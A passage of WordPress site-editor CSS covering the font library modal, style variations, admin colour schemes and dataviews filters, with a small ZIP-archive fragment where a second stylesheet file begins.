content:""; height:100%; position:absolute; right:100%; width:32px; } .edit-site-resizable-frame__handle:focus-visible{ outline:2px solid #0000; } .edit-site-resizable-frame__handle.is-resizing,.edit-site-resizable-frame__handle:focus,.edit-site-resizable-frame__handle:hover{ background-color:var(--wp-admin-theme-color); } .edit-site-push-changes-to-global-styles-control .components-button{ justify-content:center; width:100%; } @media (min-width:782px){ .font-library-modal.font-library-modal{ width:65vw; } } .font-library-modal .components-modal__header{ border-bottom:none; } .font-library-modal .components-modal__content{ margin-bottom:70px; padding-top:0; } .font-library-modal .font-library-modal__subtitle{ font-size:11px; font-weight:500; text-transform:uppercase; } .font-library-modal .components-navigator-screen{ padding:3px; } .font-library-modal__tabpanel-layout{ margin-top:32px; } .font-library-modal__tabpanel-layout .font-library-modal__loading{ align-items:center; display:flex; height:100%; justify-content:center; left:0; padding-top:124px; position:absolute; top:0; width:100%; } .font-library-modal__footer{ background-color:#fff; border-top:1px solid #ddd; bottom:32px; height:70px; margin:0 -32px -32px; padding:16px 32px; position:absolute; width:100%; } .font-library-modal__page-selection{ font-size:11px; font-weight:500; text-transform:uppercase; } @media (min-width:600px){ .font-library-modal__page-selection .components-select-control__input{ font-size:11px !important; font-weight:500; } } .font-library-modal__fonts-title{ font-size:11px; font-weight:600; text-transform:uppercase; } .font-library-modal__fonts-list,.font-library-modal__fonts-title{ margin-bottom:0; margin-top:0; } .font-library-modal__fonts-list-item{ margin-bottom:0; } .font-library-modal__font-card{ border:1px solid #e0e0e0; height:auto !important; margin-top:-1px; padding:16px; width:100%; } .font-library-modal__font-card:hover{ background-color:#f0f0f0; } .font-library-modal__font-card:focus{ position:relative; } .font-library-modal__font-card .font-library-modal__font-card__name{ font-weight:700; } .font-library-modal__font-card .font-library-modal__font-card__count{ color:#757575; } .font-library-modal__font-card .font-library-modal__font-variant_demo-image{ display:block; height:24px; width:auto; } .font-library-modal__font-card .font-library-modal__font-variant_demo-text{ flex-shrink:0; white-space:nowrap; } @media not (prefers-reduced-motion){ .font-library-modal__font-card .font-library-modal__font-variant_demo-text{ transition:opacity .3s ease-in-out; } } .font-library-modal__font-variant{ border-bottom:1px solid #e0e0e0; padding-bottom:16px; } .font-library-modal__tablist-container{ background:#fff; border-bottom:1px solid #ddd; margin:0 -32px; padding:0 16px; position:sticky; top:0; z-index:1; } .font-library-modal__tablist-container [role=tablist]{ margin-bottom:-1px; } .font-library-modal__upload-area{ align-items:center; display:flex; height:256px !important; justify-content:center; width:100%; } button.font-library-modal__upload-area{ background-color:#f0f0f0; } .font-library-modal__local-fonts{ margin:0 auto; width:80%; } .font-library-modal__local-fonts .font-library-modal__upload-area__text{ color:#757575; } .font-library__google-fonts-confirm{ align-items:center; display:flex; justify-content:center; margin-top:64px; } .font-library__google-fonts-confirm p{ line-height:1.4; } .font-library__google-fonts-confirm h2{ font-size:1.2rem; font-weight:400; } .font-library__google-fonts-confirm .components-card{ padding:16px; width:400px; } .font-library__google-fonts-confirm .components-button{ justify-content:center; width:100%; } .font-library-modal__select-all{ padding:16px 16px 16px 17px; } .font-library-modal__select-all .components-checkbox-control__label{ padding-left:16px; } .edit-site-pagination .components-button.is-tertiary{ height:32px; justify-content:center; width:32px; } .edit-site-global-styles-variations_item{ box-sizing:border-box; cursor:pointer; } .edit-site-global-styles-variations_item .edit-site-global-styles-variations_item-preview{ border-radius:2px; outline:1px solid #0000001a; outline-offset:-1px; overflow:hidden; position:relative; } @media not (prefers-reduced-motion){ .edit-site-global-styles-variations_item .edit-site-global-styles-variations_item-preview{ transition:outline .1s linear; } } .edit-site-global-styles-variations_item .edit-site-global-styles-variations_item-preview.is-pill{ height:32px; } .edit-site-global-styles-variations_item .edit-site-global-styles-variations_item-preview.is-pill .block-editor-iframe__scale-container{ overflow:hidden; } .edit-site-global-styles-variations_item:not(.is-active):hover .edit-site-global-styles-variations_item-preview{ outline-color:#0000004d; } .edit-site-global-styles-variations_item.is-active .edit-site-global-styles-variations_item-preview,.edit-site-global-styles-variations_item:focus-visible .edit-site-global-styles-variations_item-preview{ outline-color:#1e1e1e; outline-offset:1px; outline-width:var(--wp-admin-border-width-focus); } .edit-site-global-styles-variations_item:focus-visible .edit-site-global-styles-variations_item-preview{ outline-color:var(--wp-admin-theme-color); } .edit-site-styles .edit-site-global-styles-screen-root{ box-shadow:none; } .edit-site-styles .edit-site-global-styles-screen-root>div>hr{ display:none; } .edit-site-styles .edit-site-global-styles-sidebar__navigator-provider .components-tools-panel{ border-top:none; } .edit-site-styles .edit-site-global-styles-sidebar__navigator-provider{ overflow-y:auto; padding-left:0; padding-right:0; } .edit-site-styles .edit-site-global-styles-sidebar__navigator-provider .edit-site-global-styles-sidebar__navigator-screen{ outline:none; padding:12px; } .edit-site-styles .edit-site-sidebar-button{ color:#1e1e1e; } ::view-transition-image-pair(root){ isolation:auto; } ::view-transition-new(root),::view-transition-old(root){ animation:none; display:block; mix-blend-mode:normal; } body.js #wpadminbar{ display:none; } body.js #wpbody{ padding-top:0; } body.js.appearance_page_gutenberg-template-parts,body.js.site-editor-php{ background:#fff; } body.js.appearance_page_gutenberg-template-parts #wpcontent,body.js.site-editor-php #wpcontent{ padding-left:0; } body.js.appearance_page_gutenberg-template-parts #wpbody-content,body.js.site-editor-php #wpbody-content{ padding-bottom:0; } body.js.appearance_page_gutenberg-template-parts #wpbody-content>div:not(.edit-site):not(#screen-meta),body.js.appearance_page_gutenberg-template-parts #wpfooter,body.js.site-editor-php #wpbody-content>div:not(.edit-site):not(#screen-meta),body.js.site-editor-php #wpfooter{ display:none; } body.js.appearance_page_gutenberg-template-parts .a11y-speak-region,body.js.site-editor-php .a11y-speak-region{ left:-1px; top:-1px; } body.js.appearance_page_gutenberg-template-parts ul#adminmenu a.wp-has-current-submenu:after,body.js.appearance_page_gutenberg-template-parts ul#adminmenu>li.current>a.current:after,body.js.site-editor-php ul#adminmenu a.wp-has-current-submenu:after,body.js.site-editor-php ul#adminmenu>li.current>a.current:after{ border-right-color:#fff; } body.js.appearance_page_gutenberg-template-parts .media-frame select.attachment-filters:last-of-type,body.js.site-editor-php .media-frame select.attachment-filters:last-of-type{ max-width:100%; width:auto; } body.js.site-editor-php{ background:#1e1e1e; } .edit-site{ box-sizing:border-box; } .edit-site *,.edit-site :after,.edit-site :before{ box-sizing:inherit; } .edit-site{ height:100vh; } @media (min-width:600px){ .edit-site{ bottom:0; left:0; min-height:100vh; position:fixed; right:0; top:0; } } .no-js .edit-site{ min-height:0; position:static; } .edit-site .interface-interface-skeleton{ top:0; } body.admin-color-light{ --wp-admin-theme-color:#0085ba; --wp-admin-theme-color--rgb:0, 133, 186; --wp-admin-theme-color-darker-10:#0073a1; --wp-admin-theme-color-darker-10--rgb:0, 114.7661290323, 160.5; --wp-admin-theme-color-darker-20:#006187; --wp-admin-theme-color-darker-20--rgb:0, 96.5322580645, 135; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-light{ --wp-admin-border-width-focus:1.5px; } } body.admin-color-modern{ --wp-admin-theme-color:#3858e9; --wp-admin-theme-color--rgb:56, 88, 233; --wp-admin-theme-color-darker-10:#2145e6; --wp-admin-theme-color-darker-10--rgb:33.0384615385, 68.7307692308, 230.4615384615; --wp-admin-theme-color-darker-20:#183ad6; --wp-admin-theme-color-darker-20--rgb:23.6923076923, 58.1538461538, 214.3076923077; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-modern{ --wp-admin-border-width-focus:1.5px; } } body.admin-color-blue{ --wp-admin-theme-color:#096484; --wp-admin-theme-color--rgb:9, 100, 132; --wp-admin-theme-color-darker-10:#07526c; --wp-admin-theme-color-darker-10--rgb:7.3723404255, 81.914893617, 108.1276595745; --wp-admin-theme-color-darker-20:#064054; --wp-admin-theme-color-darker-20--rgb:5.7446808511, 63.829787234, 84.2553191489; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-blue{ --wp-admin-border-width-focus:1.5px; } } body.admin-color-coffee{ --wp-admin-theme-color:#46403c; --wp-admin-theme-color--rgb:70, 64, 60; --wp-admin-theme-color-darker-10:#383330; --wp-admin-theme-color-darker-10--rgb:56.2692307692, 51.4461538462, 48.2307692308; --wp-admin-theme-color-darker-20:#2b2724; --wp-admin-theme-color-darker-20--rgb:42.5384615385, 38.8923076923, 36.4615384615; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-coffee{ --wp-admin-border-width-focus:1.5px; } } body.admin-color-ectoplasm{ --wp-admin-theme-color:#523f6d; --wp-admin-theme-color--rgb:82, 63, 109; --wp-admin-theme-color-darker-10:#46365d; --wp-admin-theme-color-darker-10--rgb:69.8430232558, 53.6598837209, 92.8401162791; --wp-admin-theme-color-darker-20:#3a2c4d; --wp-admin-theme-color-darker-20--rgb:57.6860465116, 44.3197674419, 76.6802325581; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-ectoplasm{ --wp-admin-border-width-focus:1.5px; } } body.admin-color-midnight{ --wp-admin-theme-color:#e14d43; --wp-admin-theme-color--rgb:225, 77, 67; --wp-admin-theme-color-darker-10:#dd382d; --wp-admin-theme-color-darker-10--rgb:221.4908256881, 56.1788990826, 45.0091743119; --wp-admin-theme-color-darker-20:#d02c21; --wp-admin-theme-color-darker-20--rgb:207.8348623853, 44.2201834862, 33.1651376147; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-midnight{ --wp-admin-border-width-focus:1.5px; } } body.admin-color-ocean{ --wp-admin-theme-color:#627c83; --wp-admin-theme-color--rgb:98, 124, 131; --wp-admin-theme-color-darker-10:#576e74; --wp-admin-theme-color-darker-10--rgb:87.0873362445, 110.192139738, 116.4126637555; --wp-admin-theme-color-darker-20:#4c6066; --wp-admin-theme-color-darker-20--rgb:76.1746724891, 96.384279476, 101.8253275109; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-ocean{ --wp-admin-border-width-focus:1.5px; } } body.admin-color-sunrise{ --wp-admin-theme-color:#dd823b; --wp-admin-theme-color--rgb:221, 130, 59; --wp-admin-theme-color-darker-10:#d97426; --wp-admin-theme-color-darker-10--rgb:216.8782608696, 116.1847826087, 37.6217391304; --wp-admin-theme-color-darker-20:#c36922; --wp-admin-theme-color-darker-20--rgb:195.147826087, 104.5434782609, 33.852173913; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-sunrise{ --wp-admin-border-width-focus:1.5px; } }PK! dist/edit-site/style-rtl.min.cssnuȯ@charset "UTF-8";.admin-ui-page{background-color:#fff;color:#2f2f2f;container:admin-ui-page/inline-size;display:flex;flex-flow:column;height:100%;position:relative;z-index:1}@media not (prefers-reduced-motion){.admin-ui-page{transition:width .2s ease-out}}.admin-ui-page__header{background:#fff;border-bottom:1px solid #f0f0f0;padding:16px 48px;position:sticky;top:0}@container (max-width: 430px){.admin-ui-page__header{padding:16px 24px}}.admin-ui-page__header-subtitle{color:#757575;font-family:-apple-system,"system-ui",Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;font-size:13px;font-weight:400;line-height:20px;margin:0;padding-block-end:8px}.admin-ui-page__content{display:flex;flex-direction:column;flex-grow:1;overflow:auto}.admin-ui-page__content.has-padding{padding:16px 20px}@container (max-width: 430px){.admin-ui-page__content.has-padding{padding:16px 24px}}.show-icon-labels .admin-ui-page__header-actions .components-button.has-icon{padding:0 8px;width:auto}.show-icon-labels .admin-ui-page__header-actions .components-button.has-icon svg{display:none}.show-icon-labels .admin-ui-page__header-actions .components-button.has-icon:after{content:attr(aria-label);font-size:12px}.dataviews-picker-wrapper,.dataviews-wrapper{box-sizing:border-box;container:dataviews-wrapper/inline-size;display:flex;flex-direction:column;font-size:13px;height:100%;line-height:1.4;overflow:auto;scroll-padding-bottom:64px}.dataviews-filters__container,.dataviews__view-actions{box-sizing:border-box;flex-shrink:0;padding:16px 48px;position:sticky;right:0}@media not (prefers-reduced-motion){.dataviews-filters__container,.dataviews__view-actions{transition:padding .1s ease-out}}.dataviews-loading,.dataviews-no-results{align-items:center;display:flex;flex-grow:1;justify-content:center;padding:0 48px}@media not (prefers-reduced-motion){.dataviews-loading,.dataviews-no-results{transition:padding .1s ease-out}}.dataviews-loading-more{text-align:center}@container (max-width: 430px){.dataviews-filters__container,.dataviews__view-actions{padding:12px 24px}.dataviews-loading,.dataviews-no-results{padding-left:24px;padding-right:24px}}.dataviews-title-field{font-size:13px;font-weight:500;width:100%}.dataviews-title-field,.dataviews-title-field a{color:#2f2f2f;text-overflow:ellipsis;white-space:nowrap}.dataviews-title-field a{display:block;flex-grow:0;overflow:hidden;text-decoration:none}.dataviews-title-field a:hover{color:var(--wp-admin-theme-color)}.dataviews-title-field a:focus{border-radius:2px;box-shadow:0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color,#007cba);color:var(--wp-admin-theme-color--rgb)}.dataviews-title-field button.components-button.is-link{color:#1e1e1e;display:block;font-weight:inherit;overflow:hidden;text-decoration:none;text-overflow:ellipsis;white-space:nowrap;width:100%}.dataviews-title-field button.components-button.is-link:hover{color:var(--wp-admin-theme-color)}.dataviews-title-field--clickable{color:#2f2f2f;cursor:pointer}.dataviews-title-field--clickable:hover{color:var(--wp-admin-theme-color)}.dataviews-title-field--clickable:focus{border-radius:2px;box-shadow:0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color,#007cba);color:var(--wp-admin-theme-color--rgb)}.components-card__body:has(>.dataviews-picker-wrapper),.components-card__body:has(>.dataviews-wrapper){overflow:hidden;padding:8px 0 0}.components-card__body:has(>.dataviews-picker-wrapper) .dataviews-filters__container,.components-card__body:has(>.dataviews-picker-wrapper) .dataviews-footer,.components-card__body:has(>.dataviews-picker-wrapper) .dataviews-loading,.components-card__body:has(>.dataviews-picker-wrapper) .dataviews-no-results,.components-card__body:has(>.dataviews-picker-wrapper) .dataviews-view-grid,.components-card__body:has(>.dataviews-picker-wrapper) .dataviews__view-actions,.components-card__body:has(>.dataviews-wrapper) .dataviews-filters__container,.components-card__body:has(>.dataviews-wrapper) .dataviews-footer,.components-card__body:has(>.dataviews-wrapper) .dataviews-loading,.components-card__body:has(>.dataviews-wrapper) .dataviews-no-results,.components-card__body:has(>.dataviews-wrapper) .dataviews-view-grid,.components-card__body:has(>.dataviews-wrapper) .dataviews__view-actions{padding-inline:24px}.components-card__body:has(>.dataviews-picker-wrapper) .dataviews-view-table tr td:first-child,.components-card__body:has(>.dataviews-picker-wrapper) .dataviews-view-table tr th:first-child,.components-card__body:has(>.dataviews-wrapper) .dataviews-view-table tr td:first-child,.components-card__body:has(>.dataviews-wrapper) .dataviews-view-table tr th:first-child{padding-inline-start:24px}.components-card__body:has(>.dataviews-picker-wrapper) .dataviews-view-table tr td:last-child,.components-card__body:has(>.dataviews-picker-wrapper) .dataviews-view-table tr th:last-child,.components-card__body:has(>.dataviews-wrapper) .dataviews-view-table tr td:last-child,.components-card__body:has(>.dataviews-wrapper) .dataviews-view-table tr th:last-child{padding-inline-end:24px}.dataviews-bulk-actions-footer__item-count{color:#1e1e1e;font-size:11px;font-weight:500;text-transform:uppercase}.dataviews-bulk-actions-footer__container{margin-left:auto;min-height:32px}.dataviews-filters__button{position:relative}.dataviews-filters__container{padding-top:0}.dataviews-filters__reset-button.dataviews-filters__reset-button[aria-disabled=true],.dataviews-filters__reset-button.dataviews-filters__reset-button[aria-disabled=true]:hover{opacity:0}.dataviews-filters__reset-button.dataviews-filters__reset-button[aria-disabled=true]:focus{opacity:1}.dataviews-filters__summary-popover{font-size:13px;line-height:1.4}.dataviews-filters__summary-popover .components-popover__content{border-radius:4px;max-width:250px;min-width:230px;width:100%}.dataviews-filters__summary-popover.components-dropdown__content .components-popover__content{padding:0}.dataviews-filters__summary-operators-container{padding:8px 16px}.dataviews-filters__summary-operators-container:has(+.dataviews-filters__search-widget-listbox),.dataviews-filters__summary-operators-container:has(+.dataviews-filters__search-widget-no-elements),.dataviews-filters__summary-operators-container:has(+.dataviews-filters__user-input-widget){border-bottom:1px solid #e0e0e0}.dataviews-filters__summary-operators-container:empty{display:none}.dataviews-filters__summary-operators-container .dataviews-filters__summary-operators-filter-name{color:#757575;flex-shrink:0;max-width:calc(100% - 55px);overflow:hidden;text-overflow:ellipsis;white-space:nowrap}.dataviews-filters__summary-operators-container .dataviews-filters__summary-operators-filter-select{overflow:hidden;white-space:nowrap;width:100%}.dataviews-filters__summary-chip-container{position:relative;white-space:pre-wrap}.dataviews-filters__summary-chip-container .dataviews-filters__summary-chip{align-items:center;background:#f0f0f0;border:1px solid #0000;border-radius:16px;box-sizing:border-box;color:#2f2f2f;cursor:pointer;display:flex;min-height:32px;padding:4px 12px;position:relative}.dataviews-filters__summary-chip-container .dataviews-filters__summary-chip.is-not-clickable{cursor:default}.dataviews-filters__summary-chip-container .dataviews-filters__summary-chip.has-reset{padding-inline-end:28px}.dataviews-filters__summary-chip-container .dataviews-filters__summary-chip:focus-visible,.dataviews-filters__summary-chip-container .dataviews-filters__summary-chip:hover:not(.dataviews-filters__summary-chip-container .dataviews-filters__summary-chip.is-not-clickable),.dataviews-filters__summary-chip-container .dataviews-filters__summary-chip[aria-expanded=true]{background:#e0e0e0;color:#1e1e1e}.dataviews-filters__summary-chip-container .dataviews-filters__summary-chip.has-values{background:rgba(var(--wp-admin-theme-color--rgb),.04);color:var(--wp-admin-theme-color)}.dataviews-filters__summary-chip-container .dataviews-filters__summary-chip.has-values:hover,.dataviews-filters__summary-chip-container .dataviews-filters__summary-chip.has-values[aria-expanded=true]{background:rgba(var(--wp-admin-theme-color--rgb),.12)}.dataviews-filters__summary-chip-container .dataviews-filters__summary-chip:focus-visible{box-shadow:0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color);outline:none}.dataviews-filters__summary-chip-container .dataviews-filters__summary-chip .dataviews-filters-__summary-filter-text-name{font-weight:500}.dataviews-filters__summary-chip-container .dataviews-filters__summary-chip-remove{align-items:center;background:#0000;border:0;border-radius:50%;cursor:pointer;display:flex;height:24px;justify-content:center;left:4px;padding:0;position:absolute;top:50%;transform:translateY(-50%);width:24px}.dataviews-filters__summary-chip-container .dataviews-filters__summary-chip-remove svg{fill:#757575}.dataviews-filters__summary-chip-container .dataviews-filters__summary-chip-remove:focus,.dataviews-filters__summary-chip-container .dataviews-filters__summary-chip-remove:hover{background:#e0e0e0}.dataviews-filters__summary-chip-container .dataviews-filters__summary-chip-remove:focus svg,.dataviews-filters__summary-chip-container .dataviews-filters__summary-chip-remove:hover svg{fill:#1e1e1e}.dataviews-filters__summary-chip-container .dataviews-filters__summary-chip-remove.has-values svg{fill:var(--wp-admin-theme-color)}.dataviews-filters__summary-chip-container .dataviews-filters__summary-chip-remove.has-values:hover{background:rgba(var(--wp-admin-theme-color--rgb),.08)}.dataviews-filters__summary-chip-container .dataviews-filters__summary-chip-remove:focus-visible{box-shadow:0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color);outline:none}.dataviews-filters__search-widget-filter-combobox-list{border-top:1px solid #e0e0e0;max-height:184px;overflow:auto;padding:4px}.dataviews-filters__search-widget-filter-combobox-list .dataviews-filters__search-widget-filter-combobox-item-value [data-user-value]{font-weight:600}.dataviews-filters__search-widget-listbox{overflow:auto;padding:4px}.dataviews-filters__search-widget-listitem{align-items:center;border-radius:2px;box-sizing:border-box;cursor:default;display:flex;font-family:-apple-system,"system-ui",Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;font-size:13px;font-weight:400;gap:8px;line-height:20px;min-height:32px;padding:4px 12px}.dataviews-filters__search-widget-listitem:last-child{margin-block-end:0}.dataviews-filters__search-widget-listitem:focus,.dataviews-filters__search-widget-listitem:hover,.dataviews-filters__search-widget-listitem[data-active-item]{background-color:var(--wp-admin-theme-color);color:#fff}.dataviews-filters__search-widget-listitem:focus .dataviews-filters__search-widget-listitem-description,.dataviews-filters__search-widget-listitem:hover .dataviews-filters__search-widget-listitem-description,.dataviews-filters__search-widget-listitem[data-active-item] .dataviews-filters__search-widget-listitem-description{color:#fff}.dataviews-filters__search-widget-listitem:focus .dataviews-filters__search-widget-listitem-single-selection,.dataviews-filters__search-widget-listitem:hover .dataviews-filters__search-widget-listitem-single-selection,.dataviews-filters__search-widget-listitem[data-active-item] .dataviews-filters__search-widget-listitem-single-selection{background:#fff;border-color:var(--wp-admin-theme-color-darker-20,#183ad6)}.dataviews-filters__search-widget-listitem:focus .dataviews-filters__search-widget-listitem-single-selection.is-selected,.dataviews-filters__search-widget-listitem:hover .dataviews-filters__search-widget-listitem-single-selection.is-selected,.dataviews-filters__search-widget-listitem[data-active-item] .dataviews-filters__search-widget-listitem-single-selection.is-selected{background:var(--wp-admin-theme-color-darker-20,#183ad6);border-color:var(--wp-admin-theme-color-darker-20,#183ad6)}.dataviews-filters__search-widget-listitem:focus .dataviews-filters__search-widget-listitem-multi-selection,.dataviews-filters__search-widget-listitem:hover .dataviews-filters__search-widget-listitem-multi-selection,.dataviews-filters__search-widget-listitem[data-active-item] .dataviews-filters__search-widget-listitem-multi-selection{border-color:var(--wp-admin-theme-color-darker-20,#183ad6)}.dataviews-filters__search-widget-listitem:focus .dataviews-filters__search-widget-listitem-multi-selection.is-selected,.dataviews-filters__search-widget-listitem:hover .dataviews-filters__search-widget-listitem-multi-selection.is-selected,.dataviews-filters__search-widget-listitem[data-active-item] .dataviews-filters__search-widget-listitem-multi-selection.is-selected{background:var(--wp-admin-theme-color-darker-20,#183ad6);border-color:var(--wp-admin-theme-color-darker-20,#183ad6)}.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-description{color:#757575;display:block;font-size:12px;line-height:16px;overflow:hidden;text-overflow:ellipsis}.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-single-selection{border:1px solid #1e1e1e;border-radius:50%;height:24px;margin-left:12px;max-width:24px;min-width:24px;position:relative;transition:none;width:24px}@media not (prefers-reduced-motion){.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-single-selection{transition:box-shadow .1s linear}}@media (min-width:600px){.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-single-selection{height:16px;max-width:16px;min-width:16px;width:16px}}.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-single-selection:checked:before{background-color:#fff;border:4px solid #fff;box-sizing:inherit;height:12px;margin:0;position:absolute;right:50%;top:50%;transform:translate(50%,-50%);width:12px}@media (min-width:600px){.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-single-selection:checked:before{height:8px;width:8px}}.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-single-selection:focus{box-shadow:0 0 0 2px #fff,0 0 0 4px var(--wp-admin-theme-color);outline:2px solid #0000}.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-single-selection:checked{background:var(--wp-admin-theme-color);border:none}.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-single-selection{margin:0;padding:0}.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-single-selection.is-selected{background:var(--wp-admin-theme-color,#3858e9);border-color:var(--wp-admin-theme-color,#3858e9)}.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-single-selection.is-selected:before{background-color:#fff;border:4px solid #fff;border-radius:50%;box-sizing:inherit;content:"";height:12px;margin:0;position:absolute;right:50%;top:50%;transform:translate(50%,-50%);width:12px}@media (min-width:600px){.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-single-selection.is-selected:before{height:8px;width:8px}}.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection{--checkbox-size:24px;border:1px solid #949494;border-radius:2px;box-shadow:0 0 0 #0000;font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;font-size:16px;line-height:normal;margin-left:12px;padding:6px 8px;transition:none}@media not (prefers-reduced-motion){.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection{transition:box-shadow .1s linear}}@media (min-width:600px){.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection{font-size:13px;line-height:normal}}.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection:focus{border-color:var(--wp-admin-theme-color);box-shadow:0 0 0 .5px var(--wp-admin-theme-color)}.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection::-webkit-input-placeholder{color:#1e1e1e9e}.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection::-moz-placeholder{color:#1e1e1e9e}.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection:-ms-input-placeholder{color:#1e1e1e9e}.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection:focus{box-shadow:0 0 0 2px #fff,0 0 0 4px var(--wp-admin-theme-color);outline:2px solid #0000}.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection:checked{background:var(--wp-admin-theme-color);border-color:var(--wp-admin-theme-color)}.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection:checked::-ms-check{opacity:0}.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection:checked:before,.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection[aria-checked=mixed]:before{color:#fff;margin:-3px -5px}@media (min-width:782px){.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection:checked:before,.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection[aria-checked=mixed]:before{margin:-4px -5px 0 0}}.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection[aria-checked=mixed]{background:var(--wp-admin-theme-color);border-color:var(--wp-admin-theme-color)}.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection[aria-checked=mixed]:before{content:"\f460";display:inline-block;float:right;font:normal 30px/1 dashicons;vertical-align:middle;width:16px;speak:none;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}@media (min-width:782px){.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection[aria-checked=mixed]:before{float:none;font-size:21px}}.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection:disabled,.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection[aria-disabled=true]{background:#f0f0f0;border-color:#ddd;cursor:default;opacity:1}.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection{background:#fff;color:#1e1e1e;height:var(--checkbox-size);margin:0;padding:0;position:relative;width:var(--checkbox-size)}@media (min-width:600px){.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection{--checkbox-size:16px}}@media not (prefers-reduced-motion){.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection{transition:border-color .1s ease-in-out}}.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection.is-selected{background:var(--wp-admin-theme-color,#3858e9);border-color:var(--wp-admin-theme-color,#3858e9)}.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection.is-selected svg{--checkmark-size:var(--checkbox-size);fill:#fff;height:var(--checkmark-size);position:absolute;right:50%;top:50%;transform:translate(50%,-50%);width:var(--checkmark-size)}@media (min-width:600px){.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection.is-selected svg{--checkmark-size:calc(var(--checkbox-size) + 4px)}}.dataviews-filters__search-widget-filter-combobox__wrapper{padding:8px;position:relative}.dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__input{border:1px solid #949494;border-radius:2px;box-shadow:0 0 0 #0000;font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;line-height:normal;padding:6px 8px}@media not (prefers-reduced-motion){.dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__input{transition:box-shadow .1s linear}}@media (min-width:600px){.dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__input{font-size:13px;line-height:normal}}.dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__input:focus{border-color:var(--wp-admin-theme-color);box-shadow:0 0 0 .5px var(--wp-admin-theme-color);outline:2px solid #0000}.dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__input::-webkit-input-placeholder{color:#1e1e1e9e}.dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__input::-moz-placeholder{color:#1e1e1e9e}.dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__input:-ms-input-placeholder{color:#1e1e1e9e}.dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__input{display:block;font-size:16px;height:32px;margin-left:0;margin-right:0;padding:0 32px 0 8px;width:100%}@media (min-width:600px){.dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__input{font-size:13px}}.dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__input:focus{background:#fff;box-shadow:inset 0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color)}.dataviews-filters__search-widget-filter-combobox__wrapper 